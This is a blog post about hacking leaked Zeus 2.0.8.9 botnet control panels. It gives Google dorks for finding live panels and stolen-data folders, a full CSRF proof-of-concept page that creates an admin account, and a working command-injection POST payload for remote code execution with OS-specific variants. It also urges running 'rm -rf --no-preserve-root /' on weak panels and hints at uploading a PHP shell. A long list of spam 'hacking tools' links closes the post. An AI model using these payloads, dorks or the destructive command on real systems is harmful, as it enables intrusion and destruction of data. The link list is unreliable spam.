domingo, 4 de junho de 2023

Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
  • inurl:cp.php?m=login - this should be the login to the control panel
  • inurl:_reports/files  - in these folders you can find the stolen stuff, pretty funny if it gets indexed by Google
  • inurl:install/index.php - this should be deleted, but I think this is useless now.


Boring vulns found

Update: You can use the CSRF to create a new user with admin privileges:
<html> <head>     <title></title> </head> <body>     <pre>   This is a CSRF POC to create a new admin user in Zeus admin panels.   Username: user_1392719246 Password: admin1   You might change the URL from 127.0.0.1.   Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.   </pre> <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>     <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">  <input name="name" type="hidden" value="user_1392719246" />   <input name="password" type="hidden" value="admin1" />   <input name="status" type="hidden" value="1" />   <input name="comment" type="hidden" value="PWND!" />  <input name="r_botnet_bots" type="hidden" value="1" />   <input name="r_botnet_scripts" type="hidden" value="1" />   <input name="r_botnet_scripts_edit" type="hidden" value="1" />   <input name="r_edit_bots" type="hidden" value="1" />   <input name="r_reports_db" type="hidden" value="1" />   <input name="r_reports_db_edit" type="hidden" value="1" />   <input name="r_reports_files" type="hidden" value="1" />  <input name="r_reports_files_edit" type="hidden" value="1" />  <input name="r_reports_jn" type="hidden" value="1" />   <input name="r_stats_main" type="hidden" value="1" />   <input name="r_stats_main_reset" type="hidden" value="1" />   <input name="r_stats_os" type="hidden" value="1" />   <input name="r_system_info" type="hidden" value="1" />   <input name="r_system_options" type="hidden" value="1" />  <input name="r_system_user" type="hidden" value="1" />   <input name="r_system_users" type="hidden" value="1" />     </form> <script type="text/javascript">  window.onload=function(){    var counter = 10;   var interval = setInterval(function() {    counter--;    document.getElementById('countdown').innerHTML = counter;    if (counter == 0) {     redirect();     clearInterval(interval);    }   }, 1000);  };     function redirect() {   document.getElementById("csrf-form").submit();     }     </script> </body> </html>
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
  • ClickJacking - really boring stuff
  • Remember me (MD5 cookies) - a very bad idea. In this case, the remember me function is implemented in a way where the MD5 of the password and MD5 of the username is stored in a cookie. If I have XSS, I could get the MD5(password) as well.
  • SQLi - although concatenation is used instead of parameterized queries, and addslashes are used, the integers are always quoted. This means it can be hacked only in case of special encoding like GB/Big5, pretty unlikely.

Whats good news (for the C&C panel owners)


The following stuff looks good, at least some vulns were taken seriously:
  • The system directory is protected with .htaccess deny from all.
  • gate.php - this is the "gate" between the bots and the server, this PHP is always exposed to the Internet. The execution of this PHP dies early if you don't know the key. But you can get the key from the binary of this specific botnet (another URL how to do this). If you have the key, then you can fill the database with garbage, but that's all I can think of now.
  • Anti XSS: the following code is used almost everywhere
    • return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');
    My evil thought was to inject malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)


And the best vuln I was able to find, remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

function fsarcCreate($archive, $files){    ...    $archive .= '.zip';    $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';    exec($cli, $e, $r); }

The exploit could not be simpler: 
POST /cp.php?m=reports_files&path= HTTP/1.1 ... Content-Type: application/x-www-form-urlencoded Content-Length: 60  filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1
because the zip utility was not found on my Windows box. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux. You can also link this vulnerability with the CSRF one, but it is unlikely you know both the control panel admin, and the control panel URLs. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: use escapeshellcmd next time.

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: Looks like the gate.php is worth to investigate if you know the RC4 key. You can upload a PHP shell :)

More articles


  1. Nsa Hacker Tools
  2. Hacking Tools For Games
  3. Top Pentest Tools
  4. Hacker Tools Software
  5. Hacking Tools For Beginners
  6. Hack Tools Pc
  7. Hack Tools Mac
  8. Hacking Tools For Mac
  9. Hack Tools
  10. Hack Tools For Windows
  11. Bluetooth Hacking Tools Kali
  12. Hacker
  13. Hack Tool Apk No Root
  14. Pentest Tools Github
  15. Pentest Tools For Mac
  16. Hacking Tools Download
  17. Computer Hacker
  18. Underground Hacker Sites
  19. Hack Tools For Games
  20. Underground Hacker Sites
  21. Best Hacking Tools 2020
  22. Hacker
  23. Hacker Security Tools
  24. Tools Used For Hacking
  25. Pentest Tools Find Subdomains
  26. Tools Used For Hacking
  27. Pentest Tools Free
  28. Wifi Hacker Tools For Windows
  29. Hacker Tools 2020
  30. Pentest Tools Github
  31. Usb Pentest Tools
  32. Android Hack Tools Github
  33. Hacker Tools Windows
  34. Hacking Tools Windows
  35. Ethical Hacker Tools
  36. Top Pentest Tools
  37. Hacking Tools 2019
  38. Hacker Tools For Mac
  39. Pentest Tools Open Source
  40. Github Hacking Tools
  41. Hack Tools Download
  42. Hacking Tools Free Download
  43. Hacker Tools 2020
  44. Hacker Tools
  45. Hacking Tools For Games
  46. Hack App
  47. Hack Tools Mac
  48. Hacking Tools Software
  49. Install Pentest Tools Ubuntu
  50. Hacks And Tools
  51. Hacking Tools For Windows 7
  52. Hacking Tools Download
  53. Nsa Hacker Tools
  54. Easy Hack Tools
  55. Hacking Tools For Windows 7
  56. Game Hacking
  57. Tools 4 Hack
  58. Hacking App
  59. Pentest Automation Tools
  60. Hacking Tools For Windows Free Download
  61. Hacking Tools 2019
  62. Hacking Tools
  63. Hacking Tools For Kali Linux
  64. Game Hacking
  65. Best Pentesting Tools 2018
  66. Pentest Tools For Mac
  67. Hacking Tools For Windows
  68. Hacking Tools Download
  69. Pentest Tools Download
  70. Hacker Tools Windows
  71. Hacker Tools List
  72. Hack Tools For Windows
  73. Hacker
  74. Pentest Tools Port Scanner
  75. Hacker Tools For Mac
  76. Github Hacking Tools
  77. Pentest Tools Android
  78. Hacking Tools Pc
  79. Hacking Tools Github
  80. Growth Hacker Tools
  81. Hack Apps
Postado por às

Nenhum comentário:

Postar um comentário

Assinar: Postar comentários (Atom)